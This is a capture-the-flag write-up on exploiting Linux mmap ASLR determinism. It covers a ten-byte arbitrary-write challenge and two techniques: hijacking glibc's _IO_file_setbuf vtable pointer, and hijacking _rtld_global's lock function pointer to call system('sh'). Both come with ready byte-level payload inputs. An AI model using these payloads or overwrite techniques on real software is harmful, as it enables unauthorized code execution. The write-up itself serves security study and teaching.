This task is about determinism of ASLR as implemented by the Linux kernel (in early 2022): One of the mechanisms to obtain an aslr’d piece of memory is via the mmap
system call which, (un)fortunately, allocates memory at predictable relative distances from each other. The task description gave a link to a proposed patch set remedying the issue by introducing a randomize_va_space
level 3
for full randomization, but so far it hasn’t been adopted.
The vulnerable program would allow to write at most 10 (zehn = ten) bytes relative to the beginning of a freshly allocated chunk at user-specified offsets:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv)
{
size_t size = 0;
size_t idx = 0;
unsigned int i = 0;
unsigned char val = 0;
unsigned char *ptr = NULL;
size_t *doit = NULL;
if (scanf("%zx", &size) != 1)
goto fail;
ptr = calloc(size, sizeof(unsigned char));
if (!ptr)
goto fail;
if ((scanf("%zx", &size) != 1) || !((size < 11) && (size >= 0)))
goto fail;
doit = calloc(size, 2 * sizeof(size_t));
if (!doit)
goto fail;
while ((i < size) && (scanf("%zx %hhx", &idx, &val) == 2)) {
doit[2 * i] = idx;
doit[2 * i + 1] = val;
i++;
}
for (i = 0; i < size; i++) {
ptr[doit[2 * i]] = (unsigned char)doit[2 * i + 1];
}
exit(0);
fail:
exit(-1);
}
The first trick is that calloc
/malloc
fall back to allocating memory via mmap
(instead of operating in the program break via sbrk
) if the requested allocation size is larger than mp_:mmap_threshold
. We can confirm this by consulting the source code of the libc version shipped with the challenge. This is malloc.c
from glibc-2.33
, line 2403
:
/*
sysmalloc handles malloc cases requiring more memory from the system.
On entry, it is assumed that av->top does not have enough
space to service request for nb bytes, thus requiring that av->top
be extended or replaced.
*/
static void *
sysmalloc (INTERNAL_SIZE_T nb, mstate av)
{
mchunkptr old_top; /* incoming value of av->top */
INTERNAL_SIZE_T old_size; /* its size */
char *old_end; /* its end address */
long size; /* arg to first MORECORE or mmap call */
char *brk; /* return value from MORECORE */
long correction; /* arg to 2nd MORECORE call */
char *snd_brk; /* 2nd return val */
INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
INTERNAL_SIZE_T end_misalign; /* partial page left at end of new space */
char *aligned_brk; /* aligned offset into brk */
mchunkptr p; /* the allocated/returned chunk */
mchunkptr remainder; /* remainder from allocation */
unsigned long remainder_size; /* its size */
size_t pagesize = GLRO (dl_pagesize);
bool tried_mmap = false;
/*
If have mmap, and the request size meets the mmap threshold, and
the system supports mmap, and there are few enough currently
allocated mmapped regions, try to directly map this request
rather than expanding top.
*/
if (av == NULL
|| ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
&& (mp_.n_mmaps < mp_.n_mmaps_max)))
{
char *mm; /* return value from mmap call*/
try_mmap:
/*
Round up size to nearest page. For mmapped chunks, the overhead
is one SIZE_SZ unit larger than for normal chunks, because there
is no following chunk whose prev_size field could be used.
See the front_misalign handling below, for glibc there is no
need for further alignments unless we have have high alignment.
*/
if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
size = ALIGN_UP (nb + SIZE_SZ, pagesize);
else
size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
tried_mmap = true;
/* Don't try if size wraps around 0 */
if ((unsigned long) (size) > (unsigned long) (nb))
{
mm = (char *) (MMAP (0, size,
MTAG_MMAP_FLAGS | PROT_READ | PROT_WRITE, 0));
// >% snip
The value of mp_.mmap_threshold
can be set at run-time via the M_MMAP_THRESHOLD
value passed to the mallopt
function. By default, the threshold is set to 0x20000
. For example, a calloc(0x21000)
will return a chunk freshly allocated by mmap
at constant distance to all dynamic libraries in the address space. Hence, no ASLR leak is required to solve this challenge. Furthermore, even though the vulnerable program calls exit
immediately after letting the player overwrite (at most) ten bytes, there is a lot of code dispatched during exit handling providing promising targets to reach code execution.
From here, many approaches as to what data structure to overwrite exist. As part of this writeup, we will present two possible exploitation vectors.
During exit
, glibc flushes and cleans up all data that might still reside in its internal buffers. During this operation, execution reaches the _IO_cleanup
function, which calls _IO_unbuffer_all
(the later having been inlined in the given glibc binary, but this is not a problem for exploitation):
/* The following is a bit tricky. In general, we want to unbuffer the
streams so that all output which follows is seen. If we are not
looking for memory leaks it does not make much sense to free the
actual buffer because this will happen anyway once the program
terminated. If we do want to look for memory leaks we have to free
the buffers. Whether something is freed is determined by the
function sin the libc_freeres section. Those are called as part of
the atexit routine, just like _IO_cleanup. The problem is we do
not know whether the freeres code is called first or _IO_cleanup.
if the former is the case, we set the DEALLOC_BUFFER variable to
true and _IO_unbuffer_all will take care of the rest. If
_IO_unbuffer_all is called first we add the streams to a list
which the freeres function later can walk through. */
static void _IO_unbuffer_all (void);
static bool dealloc_buffers;
static FILE *freeres_list;
static void
_IO_unbuffer_all (void)
{
FILE *fp;
#ifdef _IO_MTSAFE_IO
_IO_cleanup_region_start_noarg (flush_cleanup);
_IO_lock_lock (list_all_lock);
#endif
for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain)
{
int legacy = 0;
#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
if (__glibc_unlikely (_IO_vtable_offset (fp) != 0))
legacy = 1;
#endif
if (! (fp->_flags & _IO_UNBUFFERED)
/* Iff stream is un-orientated, it wasn't used. */
&& (legacy || fp->_mode != 0))
{
#ifdef _IO_MTSAFE_IO
int cnt;
#define MAXTRIES 2
for (cnt = 0; cnt < MAXTRIES; ++cnt)
if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0)
break;
else
/* Give the other thread time to finish up its use of the
stream. */
__sched_yield ();
#endif
if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
{
fp->_flags |= _IO_USER_BUF;
fp->_freeres_list = freeres_list;
freeres_list = fp;
fp->_freeres_buf = fp->_IO_buf_base;
}
_IO_SETBUF (fp, NULL, 0); /* !!! attack here !!! */
if (! legacy && fp->_mode > 0)
_IO_wsetb (fp, NULL, NULL, 0);
#ifdef _IO_MTSAFE_IO
if (cnt < MAXTRIES && fp->_lock != NULL)
_IO_lock_unlock (*fp->_lock);
#endif
}
/* Make sure that never again the wide char functions can be
used. */
if (! legacy)
fp->_mode = -1;
}
#ifdef _IO_MTSAFE_IO
_IO_lock_unlock (list_all_lock);
_IO_cleanup_region_end (0);
#endif
}
The function traverses _IO_list_all
and calls _IO_SETBUF
on each unbuffered file. Due to glibc’s internal structure, the call to _IO_SETBUF
is hijackable. This is because stdio’s functionality is implemented via vtables
, which happen to be lists of function pointers residing in writeable memory. Some sanitization is performed on those pointers at runtime via IO_vtable_check
, but for some reason this sanitization doesn’t trigger in our case.
To understand what’s going on, we need the definitions of struct _IO_FILE
, which is wrapped by struct _IO_FILE_complete
, as defined in struct_FILE.h
(line 46
):
/* The tag name of this struct is _IO_FILE to preserve historic
C++ mangled names for functions taking FILE* arguments.
That name should not be used in new code. */
struct _IO_FILE
{
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
/* The following pointers correspond to the C++ streambuf protocol. */
char *_IO_read_ptr; /* Current read pointer */
char *_IO_read_end; /* End of get area. */
char *_IO_read_base; /* Start of putback+get area. */
char *_IO_write_base; /* Start of put area. */
char *_IO_write_ptr; /* Current put pointer. */
char *_IO_write_end; /* End of put area. */
char *_IO_buf_base; /* Start of reserve area. */
char *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
int _flags2;
__off_t _old_offset; /* This used to be _offset but it's too small. */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
struct _IO_FILE_complete
{
struct _IO_FILE _file;
#endif
__off64_t _offset;
/* Wide character stream stuff. */
struct _IO_codecvt *_codecvt;
struct _IO_wide_data *_wide_data;
struct _IO_FILE *_freeres_list;
void *_freeres_buf;
size_t __pad5;
int _mode;
/* Make sure we don't get into trouble again. */
char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};
This structure is embedded into a struct _IO_FILE_plus
, meaning that there is another trailing pointer pointing to the vtable
.
struct _IO_FILE_plus
{
FILE file;
const struct _IO_jump_t *vtable;
};
Combining all of this together means that the memory layout looks as follows:
.data:00000000001C0800 public _IO_2_1_stdin_
.data:00000000001C0800 _IO_2_1_stdin_ dd 0FBAD2088h ; DATA XREF: LOAD:0000000000009B40↑o
.data:00000000001C0800 ; .got:_IO_2_1_stdin__ptr↑o ...
.data:00000000001C0804 dq 0 ; _IO_read_ptr
.data:00000000001C080C dq 0 ; _IO_read_end
.data:00000000001C0814 dq 0 ; _IO_read_base
.data:00000000001C081C dq 0 ; _IO_write_base
.data:00000000001C0824 dq 0 ; _IO_write_ptr
.data:00000000001C082C dq 0 ; _IO_write_end
.data:00000000001C0834 dq 0 ; _IO_buf_base
.data:00000000001C083C dq 0 ; _IO_buf_end
.data:00000000001C0844 dq 0 ; _IO_save_base
.data:00000000001C084C dq 0 ; _IO_backup_base
.data:00000000001C0854 dq 0 ; _IO_save_end
.data:00000000001C085C dq 0 ; _markers
.data:00000000001C0864 dq 0 ; _chain
.data:00000000001C086C dd 0 ; _fileno
.data:00000000001C0870 dd 0 ; _flags2
.data:00000000001C0874 dq 0FFFFFFFF00000000h ; _old_offset
.data:00000000001C087C dw 0FFFFh ; _cur_column
.data:00000000001C087E db 0FFh ; _vtable_offset
.data:00000000001C087F db 0FFh ; _shortbuf
.data:00000000001C0880 db 0
.data:00000000001C0881 db 0
.data:00000000001C0882 db 0
.data:00000000001C0883 db 0
.data:00000000001C0884 db 0
.data:00000000001C0885 db 0
.data:00000000001C0886 db 0
.data:00000000001C0887 db 0
.data:00000000001C0888 dq offset _IO_stdfile_0_lock ; _lock
.data:00000000001C0890 dq 0FFFFFFFFFFFFFFFFh ; _offset
.data:00000000001C0898 dq 0 ; _codecvt
.data:00000000001C08A0 dq offset _IO_wide_data_0 ; _wide_data
.data:00000000001C08A8 dq 0 ; _freeres_list
.data:00000000001C08B0 dq 0 ; _freeres_buf
.data:00000000001C08B8 dq 0 ; __pad5
.data:00000000001C08C0 dd 0 ; _mode
.data:00000000001C08C4 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ; _unused2
.data:00000000001C08C4 db 0, 0
.data:00000000001C08D8 dq offset __GI__IO_file_jumps ; vtable
Combine the knowledge of this data structure with the ASM code of _IO_cleanup
/_IO_unbuffer_all
:
; %< snip >%
.text:0000000000083A53 loc_83A53: ; CODE XREF: _IO_cleanup+6E↑j
.text:0000000000083A53 mov eax, dword ptr cs:list_all_lock+4
.text:0000000000083A59 mov r14, cs:__GI__IO_list_all
; >% snip %<
.text:0000000000083B1C loc_83B1C: ; CODE XREF: _IO_cleanup+14F↑j
.text:0000000000083B1C ; _IO_cleanup+2B6↓j
.text:0000000000083B1C mov rax, [r14+0D8h]
; >% snip %<
.text:0000000000083B32 loc_83B32: ; CODE XREF: _IO_cleanup+317↓j
.text:0000000000083B32 xor edx, edx
.text:0000000000083B34 xor esi, esi
.text:0000000000083B36 mov rdi, r14
.text:0000000000083B39 call qword ptr [rax+58h]
First r14
gets initialized to point to the beginning of the file structure(s) at 0x83a59
. Then, the vtable
member at structure offset 0xd8
is loaded into rax
. Within the _IO_file_jumps
table, the function pointer at offset 0x58
is, unsurprisingly, function __GI__IO_file_setbuf
:
__libc_IO_vtables:00000000001C2300 __GI__IO_file_jumps dq 0 ; DATA XREF: LOAD:000000000000E358↑o
__libc_IO_vtables:00000000001C2300 ; check_stdfiles_vtables+B↑o ...
__libc_IO_vtables:00000000001C2300 ; Alternative name is '_IO_file_jumps'
__libc_IO_vtables:00000000001C2308 dq 0
__libc_IO_vtables:00000000001C2310 dq offset __GI__IO_file_finish
__libc_IO_vtables:00000000001C2318 dq offset __GI__IO_file_overflow
__libc_IO_vtables:00000000001C2320 dq offset __GI__IO_file_underflow
__libc_IO_vtables:00000000001C2328 dq offset __GI__IO_default_uflow
__libc_IO_vtables:00000000001C2330 dq offset __GI__IO_default_pbackfail
__libc_IO_vtables:00000000001C2338 dq offset __GI__IO_file_xsputn
__libc_IO_vtables:00000000001C2340 dq offset __GI__IO_file_xsgetn
__libc_IO_vtables:00000000001C2348 dq offset __GI__IO_file_seekoff
__libc_IO_vtables:00000000001C2350 dq offset _IO_default_seekpos
__libc_IO_vtables:00000000001C2358 dq offset __GI__IO_file_setbuf ; <- attackable pointer
__libc_IO_vtables:00000000001C2360 dq offset __GI__IO_file_sync
__libc_IO_vtables:00000000001C2368 dq offset __GI__IO_file_doallocate
__libc_IO_vtables:00000000001C2370 dq offset __GI__IO_file_read
__libc_IO_vtables:00000000001C2378 dq offset _IO_new_file_write
__libc_IO_vtables:00000000001C2380 dq offset __GI__IO_file_seek
__libc_IO_vtables:00000000001C2388 dq offset __GI__IO_file_close
__libc_IO_vtables:00000000001C2390 dq offset __GI__IO_file_stat
__libc_IO_vtables:00000000001C2398 dq offset _IO_default_showmanyc
__libc_IO_vtables:00000000001C23A0 dq offset _IO_default_imbue
From here, exploitation es straightforward: Perform a 3-byte partial overwrite on the __GI__IO_file_setbuf
pointer stored at libc_base+0x1C2358
to point to system
(requiring a 12-bit ASLR bruteforce), and write the string ;sh
to address libc_base+0x1C0804
to set the first argument for system
. This is because the dispatching call at libc_base+0x83B39
passes a pointer to the file structure itself to the callee. Since the file structure starts with the file magic 0x0FBAD2088
including several status bits, and we prefer not to mess with the control flow’s logic, we simply overwrite the 3 bytes immediately after the file magic with ;sh
to make sure we actually reach the vulnerable call. The ;
will terminate the meaningless file-magic garbage command passed to system
, and sh
will then give us code execution.
To trigger code execution, pass (for example) the following input to the vulnerable program, remembering the 12-bit ASLR bruteforce:
0x30000 0x6 allocation size and number of bytes to write
0x1f5348 0xe0 partially overwrite _IO_file_jumps._IO_file_setbuf with pointer to system (XXXde0)
0x1f5349 0x7d
0x1f534a 0x13
0x1f37f4 0x3b overwrite _IO_2_1_stdin_._IO_read_ptr with ";sh"
0x1f37f5 0x73
0x1f37f6 0x68
The _dl_fini
function is responsible for destructor handling of dynamically loaded objects, gets (almost) always called on program termination and dispatches globally writeable function pointers that can be overwritten to gain code execution.
The interesting part is in line 29
to 54
in dl-fini.c
:
void
_dl_fini (void)
{
/* Lots of fun ahead. We have to call the destructors for all still
loaded objects, in all namespaces. The problem is that the ELF
specification now demands that dependencies between the modules
are taken into account. I.e., the destructor for a module is
called before the ones for any of its dependencies.
To make things more complicated, we cannot simply use the reverse
order of the constructors. Since the user might have loaded objects
using `dlopen' there are possibly several other modules with its
dependencies to be taken into account. Therefore we have to start
determining the order of the modules once again from the beginning. */
/* We run the destructors of the main namespaces last. As for the
other namespaces, we pick run the destructors in them in reverse
order of the namespace ID. */
#ifdef SHARED
int do_audit = 0;
again:
#endif
for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
{
/* Protect against concurrent loads and unloads. */
__rtld_lock_lock_recursive (GL(dl_load_lock));
Line 54 expands to
GL(dl_rtld_lock_recursive) (&(GL(dl_load_lock)).mutex)
expanding to
_rtld_global.dl_rtld_lock_recursive(&_rtld_global.dl_load_lock.mutex)
.
Since both are entries of the writeable global variable _rtld_global
, one can overwrite both, the function pointer dl_rtld_lock_recursive
, and the dl_load_lock
mutex to gain an easy system("sh")
primitive. The dl_rtld_lock_recursive
pointer points to rtld_lock_default_lock_recursive
in a single-threaded application, and to pthread_mutex_lock
if the victim program was linked against libpthread
. Both are a fair distance away from system
, hence a 3-byte override is required to reach code execution. Of the overriding 3*8=24
bits, the lowest 12 bits are fixed (0xde0
) leaving the remaining 12 ASLR’d bits for brute-force.
For the ld binary handed out with the challenge, this means that one needs to write
write "sh"
to ld_base+0x30988
, and a 24-bit value ending on 0xde0
(last three nibbles of system@glibc
) to ld_base+0x30f90
.
To trigger code execution, pass (for example) the following input to the vulnerable program, remembering the 12-bit ASLR bruteforce:
0x1000000 0x5 allocation size and number of bytes to write
0x1206978 0x73 overwrite _rtld_global.dl_load_lock.mutex with "sh"
0x1206979 0x68
0x1206f80 0xe0 partially overwrite _rtld_global.dl_rtld_lock_recursive with pointer to system (XXXde0)
0x1206f81 0xbd
0x1206f82 0x4b